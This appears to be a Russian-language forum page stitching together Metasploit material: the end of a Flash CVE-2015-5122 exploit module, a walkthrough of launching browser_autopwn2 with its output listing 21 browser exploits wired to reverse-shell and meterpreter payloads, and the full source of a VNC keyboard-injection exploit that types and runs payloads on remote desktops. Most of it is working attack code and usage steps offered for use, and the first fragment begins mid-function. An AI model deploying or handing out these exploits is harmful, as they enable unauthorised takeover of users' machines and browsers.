os_name = target_info[:os_name]

# `pl` FlashVar; this module has only a Windows target, so it stays nil
# (rendered as an empty string) for any other target name.
if target.name =~ /Windows/
platform_id = 'win'
end

# NOTE(review): values are interpolated into the markup unescaped; os_name comes
# from client-side detection, so an odd value could break the attribute quoting.
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|

return html_template, binding()
end

# Loads the pre-built exploit SWF shipped with the framework data for CVE-2015-5122.
#
# @return [String] raw SWF bytes (ASCII-8BIT); raises Errno::ENOENT if the file is missing
def create_swf
  swf_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5122', 'msf.swf')
  ::File.binread(swf_path)
end
end
 
Вчера в обновлениях метасплоита выловил новый модуль....




auxiliary/server/browser_autopwn

у нас уже был чуть ли не с самого начала проекта, а вот

auxiliary/server/browser_autopwn2

только появился. Итак, запустим его и глянем, что внутри:



Собственно, из описания видно, что это очередной агрегатор браузерных эксплоитов: один URL, за которым стоит набор модулей, подбираемых под конкретный браузер.

Произведём минимальные настройки: укажем SRVHOST — адрес, на котором модуль поднимет свой HTTP-сервер и по которому к нему будут подключаться проверяемые браузеры (он должен быть достижим для них; URL с localhost, как в примере ниже, годится только для локальной проверки). Также можно задать SRVPORT — порт этого сервера, и URIPATH — путь, добавляемый к IP/домену (например, 127.0.0.1:8080/URIPATH); по умолчанию путь генерируется случайно.

И так, запустим...

msf auxiliary(browser_autopwn2) > run
[*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 6.185966114...
[*] Starting the payload handler...
[*] Using URL: http://localhost:8080/x5Y9NfXmx7zbY

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

Order Rank Name Payload
----- ---- ---- -------
1 Excellent firefox_svg_plugin firefox/shell_reverse_tcp on 4442
2 Excellent samsung_knox_smdm_url android/meterpreter/reverse_tcp on 4443
3 Excellent webview_addjavascriptinterface android/meterpreter/reverse_tcp on 4443
4 Excellent firefox_webidl_injection firefox/shell_reverse_tcp on 4442
5 Excellent firefox_tostring_console_injection firefox/shell_reverse_tcp on 4442
6 Excellent firefox_proto_crmfrequest firefox/shell_reverse_tcp on 4442
7 Great adobe_flash_hacking_team_uaf windows/meterpreter/reverse_tcp on 4444
8 Great adobe_flash_nellymoser_bof windows/meterpreter/reverse_tcp on 4444
9 Great adobe_flash_shader_job_overflow windows/meterpreter/reverse_tcp on 4444
10 Great adobe_flash_shader_drawing_fill windows/meterpreter/reverse_tcp on 4444
11 Great adobe_flash_worker_byte_array_uaf windows/meterpreter/reverse_tcp on 4444
12 Great adobe_flash_domain_memory_uaf windows/meterpreter/reverse_tcp on 4444
13 Great adobe_flash_casi32_int_overflow windows/meterpreter/reverse_tcp on 4444
14 Great adobe_flash_pixel_bender_bof windows/meterpreter/reverse_tcp on 4444
15 Great adobe_flash_net_connection_confusion windows/meterpreter/reverse_tcp on 4444
16 Great adobe_flash_copy_pixels_to_byte_array windows/meterpreter/reverse_tcp on 4444
17 Great adobe_flash_uncompress_zlib_uaf windows/meterpreter/reverse_tcp on 4444
18 Good ms14_064_ole_code_execution windows/meterpreter/reverse_tcp on 4444
19 Good adobe_flash_uncompress_zlib_uninitialized windows/meterpreter/reverse_tcp on 4444
20 Good wellintech_kingscada_kxclientdownload windows/meterpreter/reverse_tcp on 4444
21 Normal adobe_flash_opaque_background_uaf windows/meterpreter/reverse_tcp on 4444

[ + ] Please use the following URL for the browser attack:
[ + ] BrowserAutoPwn URL: http://localhost:8080/x5Y9NfXmx7zbY
[*] Server started.
[*] Starting the payload handler...

и видим вот такую картину: на одной ссылке подвешен 21 эксплоит для браузеров (каждый со своим обработчиком полезной нагрузки на портах 4442–4444).

После этого переходим по ссылке
[ + ] BrowserAutoPwn URL: http://localhost:8080/x5Y9NfXmx7zbY

и наблюдаем, как модуль Metasploit распознаёт ваш браузер (по заголовкам и JavaScript-проверкам) и подбирает под него нужный набор эксплоитов.

Всем удачи, и помните про УК РФ
 
VNC Keyboard Remote Code Execution

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/proto/rfb'
 
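class Metasploit3 < Msf::Exploit::Remote

  Rank = GreatRanking
  # Low 16 bits of the X11 keysyms for the special keys this module types
  # (0xffeb Super_L = the Windows key, 0xff0d Return, 0xffe9 Alt_L, 0xffbf F2).
  # send_key_event prepends the two zero high bytes to complete the U32 keysym.
  WINDOWS_KEY = "\xff\xeb"
  ENTER_KEY = "\xff\x0d"
  ALT_KEY = "\xff\xe9"
  F2_KEY = "\xff\xbf"

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  # Module metadata and options.
  #
  # Targets: Windows via a typed PowerShell one-liner (x86), Windows via the
  # VBScript CMDStager, and Linux/Unix via a command typed into an xterm.
  # Options: RPORT (5900), PASSWORD (optional — unset means the server is
  # expected to accept the connection without authentication), TIME_WAIT
  # (seconds to wait for a session after the payload has been typed).
  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'VNC Keyboard Remote Code Execution',
      'Description'     => %q{
        This module exploits VNC servers by sending virtual keyboard keys and executing
        a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager
        payload is typed and executed. On Unix/Linux systems a xterm terminal is opened
        and a payload is typed and executed.
      },
      'Author'          => [ 'xistence <xistence[at]0x90.nl>' ],
      'Privileged'      => false,
      'License'         => MSF_LICENSE,
      'Platform'       => %w{ win unix },
      'Targets'         =>
        [
          [ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
          [ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],
          [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
        ],
      'References'     =>
        [
          [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
        ],
      'DisclosureDate'  => 'Jul 10 2015',
      'DefaultTarget'   => 0))

    register_options(
      [
        Opt::RPORT(5900),
        OptString.new('PASSWORD', [ false, 'The VNC password']),
        OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
      ], self.class)
  end

  # Sends one RFB KeyEvent (client message type 4).
  #
  # Wire format: U8 type (4), U8 down-flag, U16 padding, U32 keysym. The key
  # constants and the "\x00c" values built by exec_command carry only the low
  # 16 bits of the keysym, so the two zero bytes after the padding are the high
  # half of the U32 — the original's comment called all four "unused" bytes.
  # Nothing is read back: the whole keystroke stream is written in one go.
  #
  # @param key [String] low 16 bits of the keysym, big-endian
  # @param down [Boolean] true for press, false for release
  def send_key_event(key, down)
    key_event = "\x04"                        # message type: KeyEvent
    key_event << (down ? "\x01" : "\x00")     # down-flag
    key_event << "\x00\x00"                   # padding
    key_event << "\x00\x00"                   # keysym, high 16 bits (always zero here)
    key_event << key                          # keysym, low 16 bits
    sock.put(key_event)
  end

  # Presses +key+ (see send_key_event for the key format).
  def press_key(key)
    send_key_event(key, true)
  end

  # Releases +key+ (see send_key_event for the key format).
  def release_key(key)
    send_key_event(key, false)
  end

  # Types +command+ one character at a time, then presses and releases Enter.
  #
  # Each character becomes the keysym 0x00XX, i.e. its Latin-1 code point,
  # which is right for the ASCII command lines this module generates. A
  # multi-byte character would make the keysym field longer than two bytes and
  # the KeyEvent malformed, so callers must pass ASCII only.
  #
  # Fix: Enter is now released after being pressed; the original left it down,
  # unlike every other key this module sends.
  #
  # @param command [String] command line to type
  def exec_command(command)
    command.each_char do |char|
      press_key("\x00#{char}")
      release_key("\x00#{char}")
    end
    press_key(ENTER_KEY)
    release_key(ENTER_KEY)
  end

  # Opens cmd.exe on a Windows desktop: Win+R, "cmd.exe", Enter.
  #
  # The one-second pauses give the Run dialog and the console time to appear;
  # they are fixed delays, not synchronised with the remote UI. Rex.select is
  # used throughout (the original mixed in one Kernel#select; both just sleep here).
  def start_cmd_prompt
    print_status("#{rhost}:#{rport} - Opening Run command")
    # Hold the Windows key for a second, tap "r" while it is down, then release both
    press_key(WINDOWS_KEY)
    Rex.select(nil, nil, nil, 1)
    press_key("\x00r")
    release_key("\x00r")
    release_key(WINDOWS_KEY)
    # Wait a second for the Run dialog
    Rex.select(nil, nil, nil, 1)
    exec_command('cmd.exe')
    # Wait a second for the cmd.exe window
    Rex.select(nil, nil, nil, 1)
  end

  # Opens a terminal on a Linux desktop via Alt+F2 -> "xterm" -> Enter.
  # Assumes a desktop whose Alt+F2 is a "Run application" dialog; fixed delays as above.
  def start_xterm
    print_status("#{rhost}:#{rport} - Opening 'Run Application'")
    press_key(ALT_KEY)
    Rex.select(nil, nil, nil, 1)
    press_key(F2_KEY)
    release_key(ALT_KEY)
    release_key(F2_KEY)
    # Wait a second for "Run application" to start
    Rex.select(nil, nil, nil, 1)
    print_status("#{rhost}:#{rport} - Opening xterm")
    exec_command('xterm')
    # Wait a second for xterm to start
    Rex.select(nil, nil, nil, 1)
  end

  # Connects, authenticates (or proceeds without a password when PASSWORD is
  # unset), types the target-specific payload through the RFB keyboard channel
  # and waits up to TIME_WAIT seconds for a session.
  #
  # Everything is typed blind — nothing is read back from the remote desktop —
  # so the fixed delays in the helpers are the only synchronisation with the UI.
  # Connection-level errors are reported through fail_with; the socket is
  # always closed in the ensure block.
  def exploit
    password = datastore['PASSWORD']

    connect
    vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)

    unless vnc.handshake
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")
    end

    if password.nil?
      print_status("#{rhost}:#{rport} - Bypass authentication")
      # Not a bypass: this path assumes the server accepts the connection
      # without a password. The single 0x10 byte written here is not the RFB
      # "None" security-type selector (which is 1); what the server makes of it
      # depends on the negotiated protocol — verify against the target before
      # relying on this path. NOTE(review): behaviour kept exactly as original.
      sock.put("\x10")
    else
      print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
      if vnc.authenticate(password)
        print_status("#{rhost}:#{rport} - Authenticated")
      else
        fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")
      end
    end

    # ClientInit with the shared-desktop flag
    unless vnc.send_client_init
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")
    end

    case target.name
    when /VBScript CMDStager/
      start_cmd_prompt
      print_status("#{rhost}:#{rport} - Typing and executing payload")
      # CmdStager calls execute_command (below) once per line; linemax bounds the typed line length
      execute_cmdstager({:flavor => :vbs, :linemax => 8100})
      exec_command('exit')
    when /Powershell/
      start_cmd_prompt
      print_status("#{rhost}:#{rport} - Typing and executing payload")
      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
      # Run the PowerShell one-liner and close the prompt behind it
      exec_command("#{command} && exit")
    when /Linux/
      start_xterm
      print_status("#{rhost}:#{rport} - Typing and executing payload")
      # Detach the payload from the terminal, then close the xterm
      exec_command("nohup #{payload.encoded} &")
      exec_command('exit')
    end

    print_status("#{rhost}:#{rport} - Waiting for session...")
    datastore['TIME_WAIT'].times do
      Rex.sleep(1)
      break if session_created?
    end
  rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
    fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
  ensure
    disconnect
  end

  # CmdStager callback: each staged line is typed as a command.
  #
  # @param cmd [String] command line to type
  # @param opts [Hash] unused; present for CmdStager's calling convention
  def execute_command(cmd, opts = {})
    exec_command(cmd)
  end

end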
 

